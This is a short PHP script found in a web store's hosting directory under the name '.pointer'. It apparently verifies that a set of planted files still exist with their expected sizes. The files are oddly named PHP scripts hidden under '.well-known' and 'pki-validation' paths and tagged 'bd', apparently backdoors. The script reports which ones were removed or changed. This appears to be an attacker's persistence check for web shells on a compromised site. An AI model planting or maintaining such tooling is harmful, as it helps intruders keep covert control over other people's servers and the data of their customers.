File: /home/niyknzcu/store.whiteteakllc.com/.pointer
<?php $r = '/home/niyknzcu/store.whiteteakllc.com'; $x = ["/puc.php"=>"bd@@1070092@@2",
"/zk.php"=>"bd@@1068991@@22",
"/.well-known/admin_members.php"=>"bd@@923056@@12",
"/export.class.php"=>"bd@@920573@@941",
"/.well-known/pki-validation/foitisi_buttons.php"=>"bd@@920581@@1709",
"/.well-known/admin_members.php"=>"bd@@920587@@946",
"/export.class.php"=>"bd@@923069@@26",
"/.well-known/pki-validation/foitisi_buttons.php"=>"bd@@923874@@89"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');